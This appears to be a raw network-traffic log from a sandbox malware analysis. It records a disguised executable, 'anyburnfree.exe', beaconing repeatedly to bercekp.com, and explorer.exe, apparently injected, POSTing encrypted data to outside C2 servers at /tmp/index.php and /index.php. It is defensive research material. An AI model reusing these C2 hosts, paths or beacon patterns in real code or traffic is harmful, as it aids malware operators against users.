                                                                                                                                                                    Feb 8, 2024 19:11:16.482821941 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:16.719595909 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:16 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    145192.168.2.349921185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:17.086734056 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:17.323519945 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:17 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    146192.168.2.349922185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:17.696679115 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:17.933727980 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:17 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    147192.168.2.349923185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:18.310008049 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:18.546680927 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    148192.168.2.349924185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:18.936707020 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:19.173711061 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:19 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    149192.168.2.349925185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:19.592638016 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:19.829612017 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:19 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    150192.168.2.349926185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:20.211078882 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:20.447751999 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:20 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    151192.168.2.349927185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:20.838180065 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:21.074789047 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:20 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    152192.168.2.349928109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:21.272135973 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://djbawpyhyvkpnev.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:11:21.272172928 CET315OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 1c b0 a8
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vuJcA|OtrS1PB:G#YZL1Y>;G}<+[zzFy-oCI+@_vH"iJvx[Nn#)In=5W
                                                                                                                                                                    Feb 8, 2024 19:11:21.704399109 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:21 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    153192.168.2.349929185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:22.178002119 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:22.415894032 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:22 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    154192.168.2.349930185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:22.777273893 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:23.014101982 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:22 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    155192.168.2.34993191.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:22.820734024 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://rcwvrbbpbpj.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 193
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:11:22.820768118 CET193OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fb e4 5c ed
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO\*XR7I\&/:PGFCOD,I|/8%I,*3n-;O$JoD
                                                                                                                                                                    Feb 8, 2024 19:11:23.073304892 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:22 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    156192.168.2.349932185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:23.456967115 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:23.693803072 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:23 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    157192.168.2.349934185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:24.145059109 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:24.382810116 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:24 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    158192.168.2.349935185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:24.728091002 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:24.964458942 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:24 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    159192.168.2.349936185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:25.308458090 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:25.546874046 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:25 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    160192.168.2.349937185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:25.920311928 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:26.156804085 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:26 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    161192.168.2.349938185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:26.518059969 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:26.754908085 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:26 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    162192.168.2.349939185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:27.126671076 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:27.362839937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    163192.168.2.349940185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:27.732115984 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:27.968717098 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    164192.168.2.349941185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:28.367944002 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:28.604516983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
